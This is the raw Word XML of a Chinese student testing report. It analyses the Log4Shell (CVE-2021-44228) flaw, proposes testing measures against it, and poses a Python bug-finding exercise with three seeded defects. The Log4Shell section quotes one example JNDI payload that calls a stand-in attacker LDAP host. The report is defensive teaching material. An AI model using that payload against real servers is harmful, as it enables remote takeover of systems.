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DC24C1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分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617A4917"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关于Log4j(Log4Shell)漏洞的软件事故分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FC008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、事故背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045460F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发生时间:</w:t>
      </w:r>
      <w:r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  <w:t>该漏洞（CVE-2021-44228）于2021年11月24日由阿里云安全团队首次向Apache软件基金会报告，并于2021年1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r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  <w:t>月9日被公开披露，随后在全球范围内引发大规模攻击活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0FD3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>影响范围:</w:t>
      </w:r>
      <w:r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  <w:t>影响范围极其广泛，堪称“核弹级”漏洞。Log4j是Java生态中最流行的日志记录框架之一，被数百万个企业应用程序和云服务所使用。几乎所有使用受影响版本Log4j(2.0-beta9至2.14.1)的Java应用都可能受到波及，其中包括苹果、亚马逊(AWS)、谷歌、微软、特斯拉、Steam等众多知名公司的产品和服务。由于其被广泛应用在各种基础组件和第三方库中，许多公司甚至不知道自己的系统中存在此漏洞，导致修复工作异常困难。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53012407">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后果:</w:t>
      </w:r>
      <w:r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  <w:t>该漏洞允许攻击者在未经身份验证的情况下实现远程代码执行(RemoteCodeExecution,RCE)。攻击者只需向目标服务器发送一段包含特定恶意字符串（例如${jndi:ldap://attacker-server.com/a}）的数据，一旦该数据被Log4j记录，即可触发JNDI(JavaNamingandDirectoryInterface)查询，连接到攻击者控制的服务器并执行任意代码。这使得攻击者可以完全接管服务器，窃取敏感数据、植入勒索软件、进行挖矿或将其作为跳板攻击内网其他系统。该漏洞的通用漏洞评分系统(CVSS)评分为最高的10.0分，意味着其危害性、影响范围和利用简易性都达到了最严重的级别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDD1205">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2、缺陷类型：Fault/Error/Failure分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37147F47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:t>Fault(缺陷):根本缺陷在于Log4j库的设计和实现。它提供了一个“JNDI查询”功能（JndiLookup），但未能对用户输入进行充分的净化和验证。开发人员默认信任了日志内容，允许对日志中包含的特殊格式字符串进行解析和执行，这是一个不安全的设计决策。这个代码层面的静态缺陷，即“不安全的JNDI查询处理逻辑”，就是本次事故的Fault。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335ED6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:t>Error(错误):当一个包含恶意JNDI字符串的用户输入（例如，来自User-Agent请求头或表单提交）被应用程序接收并传递给Log4j进行记录时，Fault被激活。此时，程序进入了一个不正确的内部状态(Error)。在这个状态下，Log4j准备去解析一个它本不应该解析的、来自外部的、不可信的JNDIURL。这个状态是动态的，是程序运行到危险逻辑时的内部表现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441D1F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:t>Failure(失效):当Log4j真正执行了JNDI查询，连接到攻击者指定的恶意服务器，并下载执行了恶意代码时，软件的外部行为表现出明显的功能失效(Failure)。它没有按照预期仅仅“记录日志”，而是执行了非预期的“远程代码”，导致服务器被控制。这种与预期功能（安全地记录日志）的偏离，就是最终用户或系统管理员能够观察到的Failure。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9D433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试阶段：本可在哪个阶段发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F86BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:t>这个漏洞理论上可以在多个测试阶段被发现，但最关键和最有效的阶段是安全测试（特别是静态和动态应用程序安全测试）和单元/集成测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFCF01C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>单元测试/集成测试(Unit/IntegrationTesting):</w:t>
      </w:r>
      <w:r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  <w:t>在开发JNDILookup功能时，如果开发人员编写了针对“恶意输入”的负面测试用例，比如测试当输入字符串包含特殊协议（如ldap,rmi）时，组件是否会尝试建立网络连接。这种有安全意识的单元测试本可以从源头上发现此问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FEDE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全测试(SecurityTesting):</w:t>
      </w:r>
      <w:r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  <w:t>静态应用程序安全测试(SAST):在代码提交和构建阶段，SAST工具可以扫描源代码，识别出“不安全的JNDI调用”、“不可信数据反序列化”等高危模式。高质量的SAST规则库很可能将此模式标记为严重漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79662872">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>动态应用程序安全测试(DAST):在应用程序部署后，DAST工具（或渗透测试人员）通过模拟外部攻击，向应用的各个输入点（HTTP头、API参数等）注入包含恶意Payload的测试探针。一个覆盖全面的DAST扫描很可能可以触发该漏洞并检测到意外的DNS查询或网络连接，从而发现问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069195B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件成分分析(SCA):</w:t>
      </w:r>
      <w:r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  <w:t>虽然SCA无法直接发现这个“0-day”漏洞，但在漏洞被披露后，SCA工具可以立即检测出项目中是否使用了受影响的Log4j版本，是应急响应和修复的关键环节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDD5A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>改进建议：如果你是测试负责人，会如何设计测试防止重演</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B152426">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:t>作为测试负责人，为了防止类似漏洞重演，我会建立一个纵深防御的测试策略，重点关注软件供应链安全和“默认不信任”原则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F37473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>强化安全测试流程的自动化和强制性:</w:t>
      </w:r>
      <w:r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  <w:t>集成SAST到CI/CD流水线:将静态代码分析（SAST）作为代码合并前的强制步骤。配置严格的扫描规则，重点检测不安全的反序列化、JNDI注入、命令注入、不安全的第三方库函数调用等高危漏洞模式。任何高危漏洞都必须在修复前进生产环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A149EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引入交互式应用安全测试(IAST):</w:t>
      </w:r>
      <w:r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  <w:t>在测试环境中部署IAST工具。IAST结合了SAST和DAST的优点，能够在程序运行时精准定位由特定输入触发的后端危险代码，非常适合发现类似Log4j的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297F3CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实施全面的软件成分分析(SCA):</w:t>
      </w:r>
      <w:r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  <w:t>建立企业级的软件物料清单(SBOM)，持续监控并自动扫描所有项目依赖的第三方库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725B08F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>订阅漏洞情报源，一旦某个依赖库被曝出新漏洞，系统应能立即告警，并自动创建修复任务给相关团队。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7DE3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设计“默认不信任”的负面测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F75EB1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模糊测试(FuzzTesting):</w:t>
      </w:r>
      <w:r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  <w:t>对所有接受外部输入的接口（API、Web表单、日志等）进行自动化模糊测试，使用包含各种特殊字符、协议和攻击模式的畸形数据，监控程序是否出现崩溃、异常网络连接或其他非预期行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EC86B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>建立攻击模式库:</w:t>
      </w:r>
      <w:r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  <w:t>维护一个内部的攻击Payload库，包含常见的注入类型（SQL,JNDI,RCE等）。在自动化测试中，将这些Payload注入到所有可能的输入点，断言系统能正确拒绝或净化它们，而不是执行它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7343DF68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加强安全意识培训和代码审查:</w:t>
      </w:r>
      <w:r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  <w:t>定期对开发和测试团队进行安全编码和安全测试的培训，让他们了解最新的攻击手法和防御策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C73AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>在代码审查(CodeReview)环节，将“是否对外部输入做了严格校验”作为一个核心检查项。鼓励交叉审查，让安全专家参与关键代码的审查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798C1A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="6959947B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="06A624B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="1AB09E3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="560CBB9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="4F79F7E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="3CDD30FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="4CC402C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="017F9732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val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>给出如下Python程序片段（含3个缺陷），要求设计至少6个测试用例，并提交测试报告（用例、执行结果、缺陷分析）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2B509">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r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  <w:t>def divide(a, b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769EA22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>returna/b#缺陷1：未检查除数为0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E87F6D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>def find_max(Ist):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D55B845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>max_val=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608AEFE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>#缺陷2：如果列表全是负数，返回结果错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195851CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>for x in Ist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921E9F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>if x &gt; max_val:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA3A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>max_val= X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFAB31E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>return max_val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7D3D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>def get_item(Ist, idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5459D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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  <w:t>returnIst[idx]#缺陷3：未检查索引越界</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B6902">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编写待测试代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED25A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2587625"/>
            <wp:effectExtent l="0" t="0" r="635" b="317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DE525">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编写测试用例类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E16714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="5715" b="317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26485">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0785E8AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5087F757">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
